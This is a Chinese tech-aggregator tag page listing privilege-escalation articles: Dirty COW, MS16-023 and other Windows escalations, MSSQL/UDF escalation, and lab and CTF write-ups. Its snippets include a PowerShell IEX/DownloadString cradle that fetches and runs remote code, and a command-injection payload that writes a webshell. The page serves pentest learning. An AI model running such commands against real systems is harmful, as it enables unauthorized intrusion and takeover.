E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
sudo-docker提权
MS16-023
提权
+ 信息收集 + 静默WinPcap安装 + WinDump抓包
0x01MS16-023
提权
powershell-nop-execbypass-c"IEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com
publicstr
·
2019-08-01 21:56
网络安全 (八
提权
)
在不知道木马密码的情况下可以在后面写上?profile=a(不一定成功)http://1.11.1.1:8000/2.asp?profile=aWindnowsuser(普通)administrator(管理员)system(控制)三者不是完全包含,administrator一定包含user,system与另外两者有交集部分Linuxuserroot提高执行的权限针对网站测试过程,当测试某一网站时
Aidang
·
2019-07-30 08:46
Linux
提权
—脏牛漏洞(CVE-2016-5195)
目录脏牛漏洞复现:脏牛漏洞脏牛漏洞,又叫DirtyCOW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linuxkernel团队在2016年10月18日已经对此进行了修复。漏洞范围:Linux内核>=2.6.22(2007年发行,到2016年10月18日才修复)简要分析:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-w
谢公子
·
2019-07-25 15:57
提权
Linux
提权
讲Linux
提权
之前,我们先看看与Linux有关的一些知识:我们常说的Linux系统,指的是Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux系统版本,每个系统版本都有自己的特性和目标人群
谢公子
·
2019-07-24 23:05
linux系统安全
提权
脏牛
提权
(cve-2016-5159)
漏洞范围:大于2.6.22版本(2007年发行,到2016年10月18日修复)危害:低权限的用户可利用这一漏洞在本地进行
提权
原理:linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限
haha13l4
·
2019-07-22 23:31
linux
渗透测试
漏洞复现
Vulnhub之 DC-3 joomla注入和ubuntu16.04
提权
Vulnhub靶机之DC-3前言刚考完试,然而不能放弃对技术的热爱,又重新拾起了dc准备把他们6个做完今天介绍的是dc-3,来看看作者对他的评价描述:DC-3是另一个专门建造的脆弱实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本在设计时考虑了初学者,虽然这一次,只有一个标志,一个入口点,根本没有线索。Linux技能和熟悉Linux命令行是必须的,基本渗透测试工具的一些经验也是必须
ST0new
·
2019-07-21 00:45
靶机
提权
当我们拿到WebShell之后,下一步干什么?当然是权限提升啊!简介通过这些最初的漏洞利用途径,攻击者将获得一定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得比最初更多的权限,以期望从其他账户访问敏感信息,甚至或者获得对整个系统的完全管理控制。当攻击者以这种方式扩大其最初的未经授权访问的权限时,我们将其行为称为权限提升攻击。水平权限提升(越权)我们假设攻击者已经获得了在线银行账户的访问权限,
刘三羊
·
2019-07-15 19:45
网络安全
i春秋DMZ大型靶场实验(四)Hash基础
sqlmap.py-rbp.txt--dbs利用sqlmap跑出root密码root666888登录phpmyadmint通过路径报错得到绝对路径c:\\www\\1.phproot权限可以直接写一句话拿shell让后进行udf
提权
一句话写入菜刀连接上传
痱子﹑
·
2019-07-13 09:00
i春秋DMZ大型靶场实验(三)内网转发DMZ2
fielname可以%00截断上传一句话木马对filenameshell_exec未对参数过滤可以拼接执行命令写一句话例如'||echo"">/var/www/html/2.php||'菜刀连接上传脏牛
提权
痱子﹑
·
2019-07-12 20:00
i春秋DMZ大型靶场实验(二)
提权
漏洞
获取跟路径也可以通过输入错路径爆出绝对路径phpmyamin弱口令登录root,rootsql直接写一句话木马select''intooutfile'C:\\phpStudy\\WWW\\1.php'菜刀连接上传ms11080.exe
提权
添加
痱子﹑
·
2019-07-12 11:00
提权
与信息收集-安全牛学习笔记
一、本地
提权
Windows下的常见用户userAdministratorSystemLinux下的常见用户UserRootWindows账户管理命令netuser查看用户信息netlocalgroup查看组信息
lsj00凌松
·
2019-07-05 23:44
网络安全
2018-2019-2 20165215《网络对抗技术》Exp10 Final Windows本地内核
提权
+Exploit-Exercises Nebula学习与实践
目录PARTONE:Windows本地内核
提权
漏洞概述漏洞原理漏洞复现windbg调试本地内核查看SSDT表和SSDTShadow表查看窗口站结构体信息利用Poc验证漏洞漏洞利用分配零页内存构造能够获取
匪夷所思05
·
2019-06-29 22:00
Linux渗透与
提权
:技巧总结篇
本文为Linux渗透与
提权
技巧总结篇,旨在收集各种Linux渗透技巧与
提权
版本,方便各位同学在日后的渗透测试中能够事半功倍。
Coisini、
·
2019-06-23 19:00
安全开发
实战篇
Windows渗透与
提权
:技巧总结篇
旁站路径问题:1、读网站配置。2、用以下VBS:OnErrorResumeNextIf(LCase(Right(WScript.Fullname,11))="wscript.exe")ThenMsgBoxSpace(12)&"IISVirtualWebViewer"&Space(12)&Chr(13)&Space(9)&"Usage:CscriptvWeb.
Coisini、
·
2019-06-23 19:22
安全开发
实战篇
windows提权与渗透
Windows总结渗透
Final——PowerShell Empire
一、介绍Empire是一款针对Windows平台的、使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、
提权
到渗透维持的一系列功能。
20165330张羽昕
·
2019-06-23 13:00
获取Shell后的操作
第一步,先whoami查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得想办法
提权
了。关于Windows
提权
:Windows
提权
提权
之后,利用mimikatz获
谢公子
·
2019-06-21 19:33
内网渗透
渗透测试
红蓝对抗
SQL Server
提权
方法汇总(MSSQL)
使用sp_oacreate进行
提权
--
提权
语句--sp_configure的作用是显示或更改当前服务器的全局配置设置,执行成功返回0,失败返回1EXECsp_configure'showadvancedoptions
Margin_51cto
·
2019-06-21 08:53
SQL
Server提权
CISP-PTE
MSSQL提权
Web安全
WEB 安全之 SQL注入 < 三 >
提权
前两篇文章介绍了攻击者通过构造SQL语句来获得“非授权信息”,都是停留在数据库层面的,其实它的威力可不仅仅止于此吆。如果DB管理员有疏忽,再加上页面有注入漏洞,危害不仅仅像前两篇最终网站后台沦陷搞不好整个系统都有可能被人控制。测试环境跟上一篇相同,MSQL+asp.net +win7。前面已经拿下了管理员用户名、密码,我们还是使用新闻详细页面(方便测试,不设防):publicpartialclas
茶乐乐
·
2019-06-19 22:00
CTF中对web服务器各种
提权
姿势
在我们拿下服务器web服务往往只是低权限用户,对于内网渗透,我们往往需要root权限,Linux系统
提权
包括使用溢出漏洞已及利用系统配置文件。
Wings_shadow
·
2019-06-19 19:00
linux
linux是多用户操作系统,不同用户有不同的权限(
提权
)/etc/shadowdate-d"1970-01-01xxxdays"/etc/passwdlinux三类用户:root用户:根用户也就是超级用户
秋名山车神
·
2019-06-19 00:00
html
npm
渗透测试——
提权
方式总结
(内容整理自网络)一、什么是
提权
提权
就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。
橘子女侠
·
2019-06-11 15:12
kali
Linux
渗透测试
云原生生态周报 Vol. 7 | Docker 再爆 CVE
原文链接:https://my.oschina.net/u/1464083/blog/3060707业界要闻Docker基础镜像Alpine爆出
提权
漏洞(CVE-2019-5021):该CVE影响自AlpineLinux3.3
chikuai9995
·
2019-06-11 15:00
渗透笔记
0x00前言本实验是一次非常深入彻底的模拟渗透,虽然只针对一台服务器,但却经历了从最初的获取网站管理员账号密码,到获得网站的webshell,最后到通过
提权
获得服务器系统最高权限的完整渗透过程。
时光途径
·
2019-06-11 13:19
渗透
黑客
数据库
破解
hash
Kali
Linux
Linux
Android进阶——性能优化之进程
提权
与拉活原理及手段完全解析(九)
文章大纲引言一、系统账户同步机制拉活1、继承Service并在内部继承实现用于返回Binder的AbstractAccountAuthenticator2、在res/xml/文件夹下定义将要显示在Account列表的资源3、在清单文件中配置AuthenticationService4、创建App的账户5、创建账户同步Service6、告知系统我们的Account需要进行同步服务7、完整的清单配置文
CrazyMo_
·
2019-06-10 10:26
Android
进阶
Android性能优化
su切换用户和sudo用户
提权
su切换的基本用法:SubstituteUser,切换用户快速切换为指定的其他用户普通用户执行时,需要验证目标用户的口令root执行时,无需验证口令命令格式用法一:su[-]目标用户用法二:su[-]-c“命令”目标用户su和su-的区别:su:只是切换成了目标用户,shell环境仍然为root的shell,通过pwd可以查看切换用户后的工作目录su-:用户身份和shell环境一起切换为目标用户[
刘鑫的博客
·
2019-06-04 13:30
linux
sudo
渗透的常见术语
脚本:网站的编辑语言serv-u利用脚本(asp/aspx/php)serv-u利用脚本(asp/aspx/php)每次用都得搜,说不准那天就搜不到了,直接存起来是最好的选择.
提权
完毕,已执行了命令:Serv-U
MIGENGKING
·
2019-06-03 22:58
域环境users
提权
调用lsrunase.exe 批处理完成安装字体
字体安装2.0由于字体安装之前的批处理采用字体文件复制到c:\windows\fonts下再注册注册表的方式,一部分字体安装不上,重新修改了批处理方式。一.字体安装批处理1.vbs脚本运行安装D:\fonts下的字体安装包,安装时fonts.vbs同时会检测C:\windows\fonts\字体名称与D:\fonts里的字体名是否一致,如果存在则忽略掉。缺点:若是表面字体名不一致,会提示重复安装,
lv287
·
2019-06-02 16:22
安装字体
一些常用的adb指令
重启adbinstallapk路径(拖拽即可)安装apkadbuninstall包名卸载apkadbpull…拉取文件adbshellinputkeyevent4模拟返回键adbshell:命令含义su
提权
Zcurry
·
2019-05-29 14:08
Android
MS09-020 iis6.0
提权
漏洞编号:MS09-020披露日期:2009/6/9受影响的操作系统:Windows2003x64sp1sp2;XP;测试系统:windows2003x64上传执行iis6.0.exe"netusertemp123.com/add"netuser
痱子﹑
·
2019-05-27 14:00
MS09-012 PR
提权
漏洞编号:MS09-012披露日期:2009/4/14受影响的操作系统:Windows2008x64x86;XP;Server2003sp1sp2;测试系统:windows2003x86上传到有执行的权限的目录在大马上运行创建成功
痱子﹑
·
2019-05-27 13:00
MS12-042 用户态调度机制特权提升漏洞
MS12-042披露日期:2012/6/12受影响的操作系统:Windows2000;XP;Server2003;windows7;Server2008;测试系统:windows7x64利用网上现有的
提权
工具测试运行
痱子﹑
·
2019-05-26 18:00
提权
案例(一)渗透某asp.net网站通过sql server数据库public
提权
思路分享
先罗列出sqlserver角色用户的权限按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述:1.bulkadmin:这个角色可以运行BULKINSERT语句.该语句允许从文本文件中将数据导入到SQLServer2008数据库中,为需要执行大容量插入到数据库的域帐号而设计.2.dbcreator:这个角色可以创建,更改,删除和还原任何数据库.不仅适合助理DBA角
痱子﹑
·
2019-05-26 11:00
提权
(最全的WEBSHELL)
最全的WEBSHELLc:d:e:…C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解
Coisini、
·
2019-05-24 11:22
靶机渗透(十二)evilscience
nmap)4.网站指纹信息扫描(whatweb)(二)Web渗透1.浏览web网页(80端口)2.目录扫描(dirb)3.文件包含漏洞利用>另一种执行ls命令的方法4.获取shell>获取反弹shell5.
提权
一
沐晗子xuer
·
2019-05-23 09:22
靶机渗透
渗透测试之中间件安全
文章目录ApacheNginxIIS短文件名猜解漏洞漏洞成因漏洞利用文件名解析漏洞利用方式利用条件漏洞修复远程代码执行漏洞MS-15-034CVE-2017-7269漏洞成因利用方式利用条件:漏洞修复
提权
漏洞
Blood_Pupil
·
2019-05-21 22:14
渗透测试
第三方应用 flashfxp,filezilla
提权
filezilla
提权
filezilla开源的ftp服务器默认监听14147端口默认安装目录下有个敏感文件filezillaserver.xml(包含用户信息)filezillaserverinterface.xml
痱子﹑
·
2019-05-21 10:00
windows中命令行窗口
提权
到管理员权限.windows 的 sudo
命令行环境中获取管理员权限第一种方法(最爽,但是被运行的命令会被当成新进程运行,运行完成后就自动关闭了.)把以下代码复制到记事本中保存为sudo.vbs然后移动到PATH任意目录中,如windowssystem32等.或自定义目录也可以.使用的时候就想linux中一样.sudodir'ShellExecute方法'作用:用于运行一个程序或脚本。'语法'.ShellExecute"applicati
lvusyy
·
2019-05-21 04:00
第三方软件 G6ftp
提权
lcx.exe-tran8027127.0.0.180214.使用客户端以管理员用户登录5.创建用户并权限设置和执行批处理文件6.上传批处理7.创建普通用户登录ftp8.执行命令quotesitex.bat9.x.bat-添加系统用户
提权
打开配置文件
痱子﹑
·
2019-05-20 09:00
第三方软件 pcanywhere
提权
pcanywhere是一个远程管理软件1.访问pcanywhere默认安装目录访问下载打开利用破解工具直接选择刚刚下载的软件点破解拿到用户密码后去百度下载客户端让后连接
痱子﹑
·
2019-05-20 08:00
第三方软件 Serv-u
提权
可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等Serv-U
提权
分两种1.有修改权限2.无权限修改第一种情况时0.判断是否安装serv-userv-u的默认端口是43958可以用nmap
痱子﹑
·
2019-05-19 22:00
CVE-2018-8174漏洞复现及内网渗透攻击
本文已在i春秋论坛发表本文涉及的知识点:CVE-2018-8174漏洞复现、内网渗透、权限维持、脚本编程、痕迹清除、端口转发、利用MS17-010
提权
CVE-2018-8174漏洞简介CVE-2018-
Waldo_cuit
·
2019-05-19 13:21
HEKE常用linux常用命令,有你不知道的没?
shell浏览目标站不行,命令行下输入ls-la/www.users/2.溢出
提权
#python–c‘impotrpty;pty.
马哥教育
·
2019-05-14 15:20
Linux运维
Linux云计算
linux***常用命令
linux运维
mysql
提权
之udf
提权
提权
的前提mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下mysql版本小于5.1,udf.dll文件在windowsserver2003下放置于c
migrate_
·
2019-05-10 19:57
渗透测试实战8——SickOS靶机入侵
目录一、实验环境二、实验步骤主动信息收集端口探测——22端口端口探测——80端口1、目录探测2、获取shell3、
提权
4、防火墙规则一、实验环境攻击机(Kali):192.168.247.181靶机(SickOS
浅浅爱默默
·
2019-05-10 16:19
Kali渗透测试
渗透测试实战6——billu靶机入侵
目录一、实验环境二、实验步骤主动信息收集端口探测——80端口(http)文件包含getshell
提权
查找数据库配置文件一、实验环境攻击机(Kali):192.168.247.165靶机(billu):192.168.247.166
浅浅爱默默
·
2019-05-10 15:40
Kali渗透测试
永恒之蓝漏洞,
提权
,拍照,打开摄像头
实验环境:虚拟机:kali-linux和windows7(未装补丁)KaliIP:192.168.88.141windows7IP:192.168.88.1431、先查看kali有没有打开postgresql服务上面这个是打开的,如没有,则执行servicepostgresqlstrat2、kali-linux输入msfconsole启动msf(若不是root登陆需sudo提升权限)命令提示行显示
haha13l4
·
2019-05-10 14:05
windows
linux
渗透测试
紧急通知:阿里聚合直播盒子APP源码2019年5月以前的版本BUG
1、TP自身爆出的
提权
后门;可注入一句话木马,可对程序和数据进行任意串改、删除。BUG关键代码详解:在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。
qq_12141929
·
2019-05-09 21:17
公告
udf
提权
总结(Mysql)
什么是udfudf=‘userdefinedfunction‘,即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。udf在mysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写。既然支持自定义函数那么我们如果想定义一个可以执行系统命令的函数也是可以的吧?于
Mikasa_
·
2019-05-06 11:03
webshell
Windows 下使用 runas 命令以指定的权限启动一个进程(非管理员、管理员)
我们也知道,可以使用一些方法为自己的应用程序
提权
。但是有没有方法可以任意指定一个权限然后运行呢?本文将介绍Windows下指定权限运行的做法。
walter lv
·
2019-05-05 09:43
dotnet
csharp
powershell windows
提权
,查看用户密码。
代码保存为xx.ps1functionGet-Information{Get-InformationUseabovetoexecutethefunction.#>[CmdletBinding()]Param()functionregistry_values($regkey,$regvalue,$child){if($child-eq"no"){$key=get-item$regkey}else{$
haha13l4
·
2019-04-27 15:11
windows
渗透测试
上一页
49
50
51
52
53
54
55
56
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他